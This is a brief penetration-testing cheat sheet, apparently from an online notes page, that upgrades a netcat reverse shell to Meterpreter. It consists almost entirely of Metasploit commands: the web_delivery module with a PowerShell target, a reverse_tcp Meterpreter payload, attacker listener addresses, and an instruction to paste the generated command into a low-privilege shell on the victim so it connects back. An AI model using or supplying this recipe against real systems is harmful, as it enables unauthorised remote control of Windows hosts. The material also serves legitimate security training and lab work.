Web Reverse Shell using Powershell
#Update nc reverse shell to meterpreter
msfconsole
use exploit/multi/script/web_delivery
options
show targets
set target 2 (powershell)
set payload windows/meterpreter/reverse_tcp
set lhost 10.1.1.1
set srvhost 10.1.1.1
run
copy output and paste into cmd of none priv shell to connect back
Last updated